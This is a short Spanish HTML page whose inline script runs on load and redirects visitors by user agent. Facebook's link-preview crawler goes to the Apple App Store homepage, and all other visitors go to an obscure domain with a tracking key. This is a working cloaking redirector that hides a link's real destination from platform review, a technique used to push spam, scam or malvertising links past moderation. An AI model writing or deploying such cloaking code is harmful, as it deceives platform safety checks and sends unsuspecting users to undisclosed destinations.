<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8">
  <title>Redirección de tráfico</title>
</head>
<body>

<script>
  // Función para redirigir según el agente de usuario
  function redirigirSegunAgente() {
    // Verificar si es un bot de Facebook
    if (/facebookexternalhit/i.test(navigator.userAgent)) {
      // Redirigir a la URL para bots de Facebook
      window.location.href = 'https://apps.apple.com/';
    } else {
      // Redirigir a la URL para usuarios reales (puedes ajustar esto según sea necesario)
      window.location.href = 'https://abberantextending.com/if2dctvkew?key=c38e5664dac9ca50eca62f2a67b19bbd';
    }
  }

  // Llamar a la función de redirección al cargar la página
  redirigirSegunAgente();
</script>

</body>
</html>
